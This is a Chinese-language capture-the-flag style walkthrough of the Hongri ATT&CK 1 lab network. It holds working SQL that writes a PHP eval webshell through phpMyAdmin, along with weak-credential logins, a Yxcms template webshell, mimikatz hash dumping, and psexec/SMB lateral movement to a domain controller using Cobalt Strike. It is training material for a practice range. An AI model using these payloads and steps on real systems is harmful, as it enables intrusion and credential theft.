红日靶场ATT&CK 1通关攻略

admin 2024年5月7日03:35:39评论10 views字数 1557阅读5分11秒阅读模式

环境

拓扑图

红日靶场ATT&CK 1通关攻略

VM1 web服务器 win7192.168.22.12910.10.10.140

VM2 win200310.10.10.135

VM3 DC win2008(10.10.10.138)

环境搭建

win7

设置内网两张网卡,开启phpstudy

win03

配置内网网卡

win08

配置内网网卡

START

Web打点

主机探测

netdiscover -r 192.168.22.0/24 -i eth0

红日靶场ATT&CK 1通关攻略

ping 的时候发现ping 不通,应该是开启了防火墙

使用nmap 开启 -Pn 过防火墙进行扫描

nmap -Pn -sC -A -n -T4 -p- 192.168.22.129

红日靶场ATT&CK 1通关攻略

80 3306 访问下页面

红日靶场ATT&CK 1通关攻略

弱口令测试一下连接检测 root/root

如果没测试出来也可以在此页面做爆破

红日靶场ATT&CK 1通关攻略

红日靶场ATT&CK 1通关攻略

再用 dirsearch 扫一下目录

红日靶场ATT&CK 1通关攻略

访问 phpmyadmin

root/root 登录后台管理页面

来到后台基本上就可以getshell

红日靶场ATT&CK 1通关攻略

在写一句话前先找到网站的绝对路径

红日靶场ATT&CK 1通关攻略

phpmyadmin写入一句话

方法一

把 secure_file_priv 设置成网站根目录

set global secure_file_priv='C:/phpStudy/WWW ';
select '<?php eval($_POST[1];?)>' into outfile 'C:/phpStudy/WWW/x.php';

方法二

利用日志写入一句话

set global general_log='on';

#开启日志功能

set global general_log_file='C:/phpStudy/WWW/x.php';

#指定日志保存文件

select '<?php eval($_POST[1]);?>';

#写入一句话

最后用蚁剑连接

红日靶场ATT&CK 1通关攻略


内网横向

用蚁剑上传 payload 执行并上线 cs

红日靶场ATT&CK 1通关攻略

这里是 administrator 的权限,可以直接 hash dump run mimikatz

内网信息收集,找到域控

红日靶场ATT&CK 1通关攻略

红日靶场ATT&CK 1通关攻略

net view 发现域内成员

红日靶场ATT&CK 1通关攻略

对域内的两个成员进行服务扫描发现都开启的445 ,现在有了域内的账号和密码可以尝试利用 smb 传递来上线cs

先派生一个 smb 监听的内网进程

红日靶场ATT&CK 1通关攻略

红日靶场ATT&CK 1通关攻略

利用内网进程,用psexec 做横向移动

红日靶场ATT&CK 1通关攻略

smb的监听器和smb的内网进程

红日靶场ATT&CK 1通关攻略

成功拿下内网的135 机器

接下来拿DC也是同样的方法

最后的结果图

红日靶场ATT&CK 1通关攻略

思维导图

红日靶场ATT&CK 1通关攻略

参考文章:https://soapffz.com/sec/558.html

工具:

cs提权插件:https://github.com/rsmudge/ElevateKit

csLondon插件:

https://github.com/k8gege/Ladonhttp://k8gege.org/p/648af4b3.html官方文档)

其他思路

Yxcms getshell

参考https://soapffz.com/sec/558.html

访问yxcms

登录后台管理界面,弱口令登录 admin/123456

index.php?r=admin

红日靶场ATT&CK 1通关攻略

在前台模板管理处修改 index_index.php 添加一句话

红日靶场ATT&CK 1通关攻略

index.php 处连接

红日靶场ATT&CK 1通关攻略

内网信息收集

https://mp.weixin.qq.com/s/aXEJpZVxxSkFUfG8TqsxHw

横向移动

  1. cs 上开通 socks 通道,在攻击机上用 proxychains 将攻击机的 msf 代入内网,但是 cs 的 socks 代理不稳定

  2. ew 添加转接隧道,在攻击机上用 proxychains 将攻击机的 msf 代入内网

  3. cs 派生到 msf,msf 使用 socks4a 代理进内网,但是并不稳定

  4. cs 派生到 msf,msf 使用使用 autoroute 添加路由进内网

  5. 用 frp 创建 socks5 代理

来自 <https://soapffz.com/sec/558.html

原文始发于微信公众号(CatalyzeSec):红日靶场ATT&CK 1通关攻略

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月7日03:35:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日靶场ATT&CK 1通关攻略https://cn-sec.com/archives/2713853.html

发表评论

匿名网友 填写信息